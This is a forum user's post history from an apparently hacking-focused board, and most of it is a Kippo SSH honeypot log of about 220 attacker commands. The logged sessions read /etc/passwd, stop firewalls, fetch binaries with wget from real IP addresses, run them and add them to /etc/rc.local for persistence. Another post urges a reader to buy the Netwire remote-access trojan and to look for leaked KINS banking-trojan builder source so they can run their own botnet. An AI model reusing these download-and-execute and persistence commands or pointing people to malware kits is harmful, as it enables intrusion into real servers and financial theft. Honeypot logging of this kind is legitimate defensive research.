Messages - nozzlechunks

1
WHOA, I don't know if it's this site's font or my resolution, but I was convinced this thread was about dick spikes and dickbots. I was sadly disappointed.

2
General discussion / Re: Share your Rig
« on: July 13, 2015, 09:22:08 pm »
HP z840 Desktop
Running WindowsServer2012
512 GB SSD
3.5 TB HDD
512 GB RAM (Yes, RAM)

************************************

I left my ex for this box.

3
General discussion / Re: security cameras
« on: July 09, 2015, 09:10:53 pm »
This isn't even Google material, this is seriously RTFM. It's also not a security / hacking question. It's an IT question. I'm new here, and even I'm getting slightly irritated with this stuff.

For everyone EXCEPT the OP: virtually every modern (i.e. not VHS) camera system has a means of exporting video to disc/dvr, in order to hand it over to law enforcement (that's typically the point of cameras, even though some orgs think throwing a fat and disgusting rentacop in front of a bunch of monitors equates to security). The ones I've played with usually also write a proprietary executable to the disc, which you must install locally to view the content, so you can't just pop open the video in a flash player or Windows Media.

4
This is a useful lesson in anonymity, too. Let's work with what the OP told us:

-Works at McDonalds (3500 stores, give or take)
-"In the ghetto" = high risk stores (500 stores).
-"It's always super dead" = lowest performing stores (200 stores)
-Win2003 + i2i (assuming it's not standard issue, some stores may have different video vendor) (100 stores)
-OP is about 18, getting GED, interested in computers.
-OP had specific interaction with manager

So with just that, you're talking maybe 100 managers being emailed about a specific interaction with a very specific person. Chances of detection are immense.

Probably 50% of people on hacking/security forums are working for corporations like McDonald's.

5
To the OP:

If you want to learn how botnets work, buy one! Here's a crappy one for cheap:

http://www.worldwiredlabs.com/

Buy it, play with it. It's perfectly legal in a lab. You can also look for YouTube videos on Netwire to see the basics:

-A builder, to create, configure, and compile your payload.
-A management console, to manage all the victim boxes calling back.

Seriously, learn the botnet ecosystem by creating and managing your own botnet. THEN start hammering on the skills once you get the big picture.


BITCHY EDIT: Really? Someone stole a cookie over this? I guess Sun Tzu was wrong when he said "know thy enemy?"

SUBSTANTIVE EDIT: You can also look for KINS Builder 2.0.0.0, which had its source code leaked recently in supposedly "criminal forums" that were totally easy to find and join. Not as user friendly as the "supported" stuff like Netwire, but it's free, and it's the real deal.

6
General discussion / Re: CryptoWall
« on: June 24, 2015, 05:16:45 pm »
Pay the ransom, try harder next time.

Even if we lived in a magical world where ransomware used weak encryption algorithms and even weaker keys, it would likely still take weeks, months, or centuries to bruteforce with great hardware. I assume your friend needs the document "now" or "soon."

I think the best advice you can give folks is to have a bitcoin wallet up and running. It sometimes takes people many days of research just to figure out how bitcoin works, which means even people willing to pay ransom won't be able to do it in time (7 days).

7
Hacking and Security / Re: 1 day of running a SSH honeypot
« on: June 24, 2015, 04:59:48 pm »
I don't have any of the files anymore, so who knows what they were pulling down. Probably bots and downloaders.

Yeah, I don't think these people are noobs. A lot of the stuff they do would work against an environment that was A) real, and 2) misconfigured. I'm guessing this is one of those operations where they scan for the low-hanging stuff and then pass this off to the next team, to actually dig in to see what they got. If they get something interesting, they probably hand it off to a traversal team, etc.

If anyone has cool ideas for different experiments I could work on with Kippo and other honeypot tools, feel free to throw them out there or even PM me!

8
Hacking and Security / Re: 1 day of running a SSH honeypot
« on: June 23, 2015, 09:04:02 pm »
Necropost, at Proxx's suggestion.

Here's some honeypot logs containing post log-in activity. I was running Kippo with the fake shell environment. What you see, generally, is scripted activity, and it's by the numbers. Show up, look for passwords, then try to turn off the firewall via iptables and pull down files. None of the files were pulled down, of course, but I was able to hit a few of the download IPs and pull down that and more because they left directory traversal on.

Some interesting callouts... there are a number of techniques used to turn off the firewall, from IP Tables, all the way down to commands specific to certain NIX distros. Also, some of them actually tried to pull down distros to install on my box.

It took a while to find this, but I think I have more logs lying around. I'm also gonna' be playing with more honeypots later this summer, so I anticipate more to share.

Thanks for looking!

*Note, the long string is the session ID, so you can see every event that occurs in a particular session.


Code:
1,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:46",\N,1,"ls"
2,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:48",\N,1,"whoami"
3,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:53",\N,1,"cat /etc/pa"
4,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:57",\N,1,"cat /etc/passwd"
5,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:27:00",\N,1,"exit"
6,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:15",\N,1,"ls"
7,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:16",\N,1,"exit"
8,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:28",\N,1,"cat /etc/passwd"
9,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:30",\N,1,"exit"
10,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:31",\N,0,"quit"
11,"3a11f5444bc111e4b273024542c06214","2014-10-04 12:23:26",\N,1,"echo \"WinSCP: this is end-of-file:0\""
12,"486114e04bc111e4b273024542c06214","2014-10-04 12:23:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
13,"5dd168204bc111e4b273024542c06214","2014-10-04 12:24:25",\N,1,"echo \"WinSCP: this is end-of-file:0\""
14,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:02",\N,1,"ls"
15,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:10",\N,1,"uname -a"
16,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:22",\N,0,"http://120.24.62.114:8989/txma"
17,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:30",\N,0,"http://120.24.62.114:8989/txma"
18,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:35",\N,1,"wget http://120.24.62.114:8989/txma"
19,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:44",\N,0,"service iptables stop"
20,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:03",\N,1,"wget http://120.24.62.114:8989/txma"
21,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:38",\N,1,"ls"
22,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:06",\N,1,"wget http://120.24.62.114:8989/txma"
23,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:16",\N,1,"uname -a"
24,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:52:45",\N,0,"http://120.24.62.114:8989/qqwwqqww"
25,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:53:13",\N,0,"service iptables stop"
26,"307e51b44caf11e4b3d002b6d5d64ab8","2014-10-05 16:46:57",\N,1,"uname -a"
27,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:17",\N,0,"/etc/init.d/iptables stop"
28,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:21",\N,0,"service iptables stop"
29,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:25",\N,0,"SuSEfirewall2 stop"
30,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:29",\N,0,"reSuSEfirewall2 stop"
31,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:33",\N,1,"cd /tmp"
32,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:37",\N,1,"wget -c http://42.96.191.5:300/dd-wrt"
33,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:41",\N,1,"chmod 777 dd-wrt"
34,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:45",\N,0,"./dd-wrt"
35,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:49",\N,1,"wget -c http://42.96.191.5:300/Linux2.4"
36,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:53",\N,1,"chmod 777 Linux2.4"
37,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:57",\N,0,"./Linux2.4"
38,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:01",\N,1,"wget -c http://42.96.191.5:300/Linux2.6"
39,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:05",\N,1,"chmod 777 Linux2.6"
40,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:09",\N,0,"./Linux2.6"
41,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:13",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
42,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:17",\N,1,"chmod 777 linux-arm"
43,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:21",\N,0,"./linux-arm"
44,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:25",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
45,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:29",\N,1,"chmod 777 linux-mips"
46,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:33",\N,0,"./linux-mips"
47,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:11",\N,0,"/etc/init.d/iptables stop"
48,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:15",\N,0,"service iptables stop"
49,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:19",\N,0,"SuSEfirewall2 stop"
50,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:23",\N,0,"reSuSEfirewall2 stop"
51,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:27",\N,1,"cd /tmp"
52,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:31",\N,1,"wget -c http://42.96.191.5:300/G32"
53,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:35",\N,1,"chmod 0755 /tmp/G32"
54,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:39",\N,0,"./G32 &"
55,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:43",\N,1,"wget -c http://42.96.191.5:300/G64"
56,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:47",\N,1,"chmod 0755 /tmp/G64"
57,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:51",\N,0,"./G64 &"
58,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:55",\N,1,"wget -c http://42.96.191.5:300/FreeBsd"
59,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:59",\N,1,"chmod 0755 /tmp/FreeBsd"
60,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:03",\N,0,"./FreeBsd &"
61,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:07",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
62,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:11",\N,1,"chmod 0755 /tmp/linux-arm"
63,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:15",\N,0,"./linux-arm &"
64,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:19",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
65,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:23",\N,1,"chmod 0755 /tmp/linux-mips"
66,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:27",\N,0,"./linux-mips &"
67,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:45",\N,1,"wget http://117.21.173.140:7000/lele"
68,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:49",\N,1,"wget http://117.21.173.140:7000/lele"
69,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:30",\N,0,"service iptables stop"
70,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:37",\N,1,"wget wget http://222.186.34.123:123/1995xxoo"
71,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:44",\N,1,"chmod u+x 1995xxoo"
72,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:51",\N,0,"./1995xxoo &"
73,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:58",\N,1,"wget http://222.186.34.123:123/xxoo1995"
74,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:05",\N,1,"chmod u+x xxoo1995"
75,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:12",\N,0,"./xxoo1995 &"
76,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:19",\N,1,"cd /tmp"
77,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
78,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:33",\N,1,"echo \"./1995xxoo\">>/etc/rc.local"
79,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:40",\N,1,"echo \"./xxoo1995&\">>/etc/rc.local"
80,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
81,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:01",\N,0,"service iptables stop"
82,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:08",\N,1,"wget http://222.186.34.123:123/rrmr"
83,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:15",\N,1,"chmod u+x rrmr"
84,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:22",\N,0,"./rrmr &"
85,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:29",\N,1,"wget http://222.186.34.123:123/mmrr"
86,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:36",\N,1,"chmod u+x mmrr"
87,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:43",\N,0,"./mmrr &"
88,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:50",\N,1,"wget http://222.186.34.123:123/qgg"
89,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:57",\N,1,"chmod u+x qgg"
90,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:04",\N,0,"./qgg &"
91,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:11",\N,1,"cd /tmp"
92,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:18",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
93,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:25",\N,1,"echo \"./rrmr\">>/etc/rc.local"
94,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:32",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
95,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:39",\N,1,"echo \"./qgg&\">>/etc/rc.local"
96,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:46",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
97,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:13",\N,0,"service iptables stop"
98,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:20",\N,1,"wget http://222.186.34.123:123/rrmr"
99,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:27",\N,1,"chmod u+x rrmr"
100,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:34",\N,0,"./rrmr &"
101,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:41",\N,1,"wget http://222.186.34.123:123/mmrr"
102,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:48",\N,1,"chmod u+x mmrr"
103,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:55",\N,0,"./mmrr &"
104,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:02",\N,1,"wget http://222.186.34.123:123/qgg"
105,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:09",\N,1,"chmod u+x qgg"
106,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:16",\N,0,"./qgg &"
107,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:23",\N,1,"cd /tmp"
108,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:30",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
109,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:37",\N,1,"echo \"./rrmr\">>/etc/rc.local"
110,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:44",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
111,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:51",\N,1,"echo \"./qgg&\">>/etc/rc.local"
112,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
113,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:31",\N,1,"wget http://118.244.150.49:8889/ooxx59"
114,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:38",\N,1,"chmod +x ooxx59"
115,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:45",\N,0,"./ooxx59"
116,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:52",\N,1,"chattr +i ooxx59"
117,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:59",\N,1,"wget http://118.244.150.49:8889/ooxx95"
118,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:06",\N,1,"chmod +x ooxx95"
119,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:13",\N,0,"./ooxx95"
120,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:20",\N,1,"chattr +i ooxx95"
121,"7d478f0c5eba11e4b3d002b6d5d64ab8","2014-10-28 15:53:22",\N,1,"uname -a"
122,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:01",\N,0,"service iptables stop"
123,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:08",\N,1,"wget http://222.186.34.120:8899/ttz32"
124,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:14",\N,1,"chmod u+x ttz32"
125,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:20",\N,0,"./ttz32 &"
126,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:26",\N,1,"cd /tmp"
127,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:32",\N,1,"wget http://222.186.34.120:8899/ttz24"
128,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:38",\N,1,"chmod u+x ttz24"
129,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:44",\N,0,"./ttz24 &"
130,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:50",\N,1,"cd /tmp"
131,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:56",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
132,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:02",\N,1,"echo \"./ttz32&\">>/etc/rc.local"
133,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:08",\N,1,"echo \"./ttz24&\">>/etc/rc.local"
134,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
135,"edefd36a65c011e4b273024542c06214","2014-11-06 14:26:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
136,"39265708667c11e4b273024542c06214","2014-11-07 12:47:47",\N,1,"uname -a"
137,"b8065b4266a711e482800254c1a985ea","2014-11-07 17:58:57",\N,1,"wget http://204.44.104.93:8080/iten32"
138,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:51",\N,0,"/etc/init.d/iptables stop"
139,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:55",\N,1,"wget http://204.44.104.93:8080/iten32"
140,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:59",\N,1,"chmod 0755 iten32"
141,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:03",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
142,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:07",\N,1,"wget http://204.44.104.93:8080/iten64"
143,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:11",\N,1,"chmod 0755 iten64"
144,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:15",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
145,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:06",\N,0,"/etc/init.d/iptables stop"
146,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:16",\N,1,"wget http://204.44.104.93:8080/iten32"
147,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:26",\N,1,"chmod 0755 iten32"
148,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:36",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
149,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:46",\N,1,"wget http://204.44.104.93:8080/iten64"
150,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:56",\N,1,"chmod 0755 iten64"
151,"2300244e672211e482800254c1a985ea","2014-11-08 08:36:06",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
152,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:40",\N,0,"/etc/init.d/iptables stop"
153,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:50",\N,1,"wget http://204.44.104.93:8080/iten32"
154,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:00",\N,1,"chmod 0755 iten32"
155,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:10",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
156,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:20",\N,1,"wget http://204.44.104.93:8080/iten64"
157,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:30",\N,1,"chmod 0755 iten64"
158,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:40",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
159,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:30:58",\N,0,"service iptables stop"
160,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:03",\N,1,"wget http://60.169.74.173:8889/ux24"
161,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:08",\N,1,"chmod u+x ux24"
162,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:13",\N,0,"./ux24 &"
163,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:18",\N,1,"cd /tmp"
164,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:23",\N,1,"wget http://60.169.74.173:8889/ux32"
165,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:28",\N,1,"chmod u+x ux32"
166,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:33",\N,0,"./ux32 &"
167,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:38",\N,1,"cd /tmp"
168,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:43",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
169,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:48",\N,1,"echo \"./ux24&\">>/etc/rc.local"
170,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:53",\N,1,"echo \"./ux32&\">>/etc/rc.local"
171,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
172,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:32",\N,0,"service iptables stop"
173,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:38",\N,1,"wget http://60.169.74.173:8889/ha32"
174,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:44",\N,1,"chmod u+x ha32"
175,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:50",\N,0,"./ha32 &"
176,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:56",\N,1,"cd /tmp"
177,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:02",\N,1,"wget http://60.169.74.173:8889/ha24"
178,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:08",\N,1,"chmod u+x ha24"
179,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:14",\N,0,"./ha24 &"
180,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:20",\N,1,"cd /tmp"
181,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
182,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:32",\N,1,"echo \"./ha32&\">>/etc/rc.local"
183,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:38",\N,1,"echo \"./ha24&\">>/etc/rc.local"
184,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:44",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
185,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:35",\N,0,"service iptables stop"
186,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:41",\N,1,"wget http://60.169.79.211:8080/jiuwu"
187,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:47",\N,1,"chmod u+x jiuwu"
188,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:53",\N,0,"./jiuwu &"
189,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:59",\N,1,"cd /tmp"
190,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:05",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
191,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:11",\N,1,"echo \"./jiuwu&\">>/etc/rc.local"
192,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:17",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
193,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:45",\N,0,"service iptables stop"
194,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:50",\N,1,"wget http://222.186.34.123:8889/mu24"
195,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:55",\N,1,"chmod u+x mu24"
196,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:00",\N,0,"./mu24 &"
197,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:05",\N,1,"cd /tmp"
198,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
199,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:15",\N,1,"echo \"./mu24&\">>/etc/rc.local"
200,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:20",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
201,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:12",\N,1,"w"
202,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:16",\N,1,"uname -a"
203,"2c2d946c6a4611e4b3d002b6d5d64ab8","2014-11-12 08:30:42",\N,1,"echo \"WinSCP: this is end-of-file:0\""
204,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:55",\N,0,"54.69.25.214"
205,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:57",\N,0,"netstat"
206,"81d5ad7c6b4611e4b273024542c06214","2014-11-13 15:05:33",\N,1,"echo \"WinSCP: this is end-of-file:0\""
207,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:14",\N,1,"ls"
208,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:16",\N,1,"cd .."
209,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:17",\N,1,"ls"
210,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:20",\N,1,"cat /etc/passwd"
211,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:21",\N,1,"ls"
212,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:27",\N,1,"exit"
213,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:29",\N,1,"exit"
214,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:31",\N,0,"quit"
215,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:10",\N,1,"wget www.google.com"
216,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:13",\N,0,"quit"
217,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:15",\N,1,"exit"
218,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:47",\N,1,"ls"
219,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:52",\N,1,"cat /etc/passwd"
220,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:27",\N,1,"ls"
